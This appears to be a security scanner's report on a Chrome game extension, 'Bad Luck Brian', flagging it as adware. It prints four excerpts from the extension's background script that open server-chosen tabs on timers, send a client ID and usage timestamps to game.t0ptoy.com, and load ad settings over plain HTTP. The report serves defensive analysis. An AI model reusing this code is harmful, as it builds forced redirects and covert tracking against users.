Security Alert: Malware Risk Confirmed
Bad Luck Brian
ID: meldlchplkgmljkgckngodeigepjndcg
Extension Info & Metadata
Publisher Contextual Analysis
- Author: rogargauprer1976
- MX records exist: Yes
- Domain exists: Yes
- Is disposable: No
- Is role-based: No
- Mailbox exists: Yes
Bad Luck Brian just bought a present for his girlfriend, but it's starting to rain! Help him protect the present as long as possible, otherwise his girlfriend is going to be very angry! How To Play? Use arrow keys to move/.
The shows() function fetches an ad payload from game.t0ptoy.com and, after an 18-second silent delay, opens a new browser tab to a URL entirely controlled by the remote ad server (r.body.click_action) — with no notification, no user gesture, and no opt-out. This is classic adware forced-redirect behavior: the game popup is bait to keep the extension installed while the background silently navigates the user's browser on a schedule controlled by the third-party server.
```javascript
function shows() {
  fetch('http://game.t0ptoy.com/game_api_vv.php?eid=' + chrome.runtime.id, {
      method: 'GET',
      cache: 'no-cache',
      referrerPolicy: 'no-referrer'
    })
    .then(function(r) {
      if (!!r.body) {
        let ar = [r.body.icon, r.body.image];
        ar.forEach((u, i) => {
          fetch(u, { mode: 'no-cors' }).catch(err => {})
        });
        setTimeout(() => {
          !!r.body.click_action ? chrome.tabs.create({ url: r.body.click_action }) : NULL;
          localStorage.count = 1
        }, 18E3);
      } else {
        show();
      }
    })
```

Every time the extension runs its ad cycle it exfiltrates a unique client identifier (cid), install timestamp (ut), current timestamp (ct), last-push-click and last-push-show timestamps (lc/ls), cumulative click count (cc), and the Chrome extension runtime ID (eid) to game.t0ptoy.com — a third-party ad network with no connection to the publisher's disclosed identity ([email protected]). No privacy policy is declared and no data-collection categories are disclosed in the CWS listing. This is covert behavioral tracking sent to an external ad network.
```javascript
return fetch('http://game.t0ptoy.com/game_api_v21.php?cid=' + localStorage.clientID +
  '&ut=' + localStorage.instalTimestamp +
  '&ct=' + getUnixTimestamp() +
  '&lc=' + localStorage.lastPushClick +
  '&ls=' + localStorage.lastPushShow +
  '&cc=' + localStorage.countClick +
  '&eid=' + chrome.runtime.id +
  '&ads=' + ads, {
    method: 'GET',
    cache: 'no-cache',
    referrerPolicy: 'no-referrer'
  })
```

After displaying an ad notification, the extension auto-opens a new tab to data.link (a URL from the remote ad server) after a server-controlled delay (data.time_close). The tab is opened regardless of whether the user interacted with the notification — both branches of the if/else call chrome.tabs.create. This removes any pretence of user consent: the ad redirect fires on a timer set by game.t0ptoy.com, not by user action.
```javascript
if (data.close) {
  setTimeout(() => {
    chrome.notifications.getAll((p) => {
      if (p[id]) {
        chrome.tabs.create({ url: data.link });
        chrome.notifications.clear(id);
        click(id);
      } else {
        let arrPush = JSON.parse(localStorage.arrPush),
          count = arrPush.filter(x => Object.keys(x) == id).length;
        if (!(0 < count)) {
          chrome.tabs.create({ url: data.link });
          click(id);
        }
      }
    })
  }, data.time_close);
}
```

The extension fetches its core behavioral parameters (notification frequency, requireInteraction flag) from a remote server over plain HTTP (not HTTPS), meaning the ad network can update how aggressively the extension spams notifications and opens tabs without any extension update. This remote configuration channel also exposes the extension to man-in-the-middle manipulation of its ad behavior.
```javascript
fetch('http://game.t0ptoy.com/_setting.json')
  .then(function(resp) {
    return resp.json();
  })
  .then(function(data) {
    localStorage.requireInteraction = data.requireInteraction;
    localStorage.frequency = data.frequency;
    localStorage.updateSettingTime = getUnixTimestamp();
  })
```

By severity
Versions scanned
Showing 1 of 1 scanned version with more than one unique finding. Counts are unique findings that include each version.
| Extension Version | Code Review Findings |
|---|---|
| 1.0.1 | 4 |
Files with findings
1 distinct path — top paths by unique finding count:
- background-script.js: 4
